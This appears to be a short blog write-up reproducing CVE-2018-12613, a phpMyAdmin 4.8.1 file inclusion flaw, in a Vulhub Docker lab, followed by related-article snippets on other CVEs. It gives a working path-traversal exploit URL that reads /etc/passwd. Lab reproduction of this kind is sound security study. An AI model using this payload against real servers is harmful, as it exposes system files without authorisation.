首页 > 其他分享 >CVE-2018-12613

CVE-2018-12613

时间:2024-05-23 10:31:11浏览次数:19  
标签:phpmyadmin .. index 2018 CVE 12613

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the index.php, causing files iclusion vulnerabilitiy.

Setup

cd vulhub/phpmyadmin/cve-2018-12613
docker-compose up -d

After the environment starts,visit http://10.10.10.8:8080. The phpmyadmin is "config" mode,so we can login directly.

Exploit

Visit http://10.10.10.8:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd, the result indicates that the file inclusion vulnerability exist:
img

标签:phpmyadmin,..,index,2018,CVE,12613
From: https://www.cnblogs.com/kalixcn/p/18207800

相关文章

  • ECMA 2018(es9)新特性
    本章内容:异步迭代Promise.finally()Rest/Spread属性正则表达式命名捕获组(RegularExpressionNamedCaptureGroups)正则表达式反向断言(lookbehind)正则表达式dotAll模式正则表达式Unicode转义非转义序列的模板字符串1.异步迭代在async/await的某些时刻,你可能尝试......
  • 远程代码执行CVE-2018-7600
    最近打的靶场不约而同地都用到了这个漏洞好好复现下,主要针对的是Drupal的cms框架漏洞环境搭建主要利用vulhub漏洞靶场的环境搭建,建议docker配一个阿里云的镜像加速器,不然的话拉取镜像的时间会很久在/etc/docker下创建一个daemon.json文件写入{"registry-mirrors":["https......
  • P8675 [蓝桥杯 2018 国 B] 搭积木
    原题链接题解1.请务必读清题干意思2.如果以最顶端积木的位置为状态,是可以穷尽所有情况的,则状态为\(dp[i][l][r]\),最顶端第\(i\)层只在区间\([l,r]\)内连续放置积木有几种方法3.状态转移方程$dp[i][l][r]=\sum_1^l\sum_r^mdp[i+1][x][y]$把\(x,y\)看成二维坐标上......
  • Mac install omicverse second time
    安装老版本的omicverse后发现scvelomodule缺少,再单独安装scvelo,更新了一些包后ov不能用了,于是重新安装!幸好mac的conda安装非常友好按照安装文档https://omicverse.readthedocs.io/en/latest/Installation_guild/#4-after-the-installation-of-pytorch-we-can-start-to-install-......
  • CVE-2016-3088
    ActiveMQ任意文件写入漏洞(CVE-2016-3088)环境搭建cdvulhub/activemq/CVE-2016-3088docker-composebuilddocker-composeup-d环境监听61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。访问http://10.10.10.8:8161/看到web页面,说明环境已成功运行。......
  • MacBook安装omicverse
    1)根据oneclick部分安装condacreate-nomicversepython=3.10condaactivateomicversecondainstallmamba-cconda-forgemambainstalljaxjaxlib-cconda-forgepip3installtorchtorchvisiontorchaudiopip3installtorch_geometric安装pyg_lib卡住2)根据说明......
  • 洛谷 P4383 [八省联考 2018] 林克卡特树
    原题等价于在树上选出\(k+1\)条不相交链,最大化边权和。树形DP。设\(f_{u,k,0/1/2}\)表示在\(u\)的子树中选了\(k\)条链,\(u\)的度数为\(0,1,2\)的最大边权和。注意到状态里缺了链退化为单个点的情况,可以把它放到\(f_{u,k,2}\)中(相当于自环)。转移时分讨一......
  • CVE-2017-2824
    ZabbixServertrapper命令注入漏洞(CVE-2017-2824)Zabbix是由AlexeiVladishev开发的一种网络监视、管理系统,基于Server-Client架构。其Server端trappercommand功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbixproxy发起请求......
  • 2018元旦快乐!嘿嘿嘿……
    Tips:当你看到这个提示的时候,说明当前的文章是由原emlog博客系统搬迁至此的,文章发布时间已过于久远,编排和内容不一定完整,还请谅解`2018元旦快乐!嘿嘿嘿……日期:2018-1-1阿珏谈天说地浏览:2057次评论:0条emmm~首先跟来访的朋友们说声元旦快乐!新年快乐!狗年......
  • F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750)
    漏洞描述该漏洞是一个影响F-logicDataCube3v1.0的SQL注入漏洞,这个漏洞源于'req_id'参数的用户输入没有得到适当的清理或过滤。通过在'req_id'参数中注入恶意的SQL代码,远程攻击者可以执行任意SQL命令,从而可能访问、修改或删除数据库中的敏感信息Fofa:title=="DataCube3"POC:P......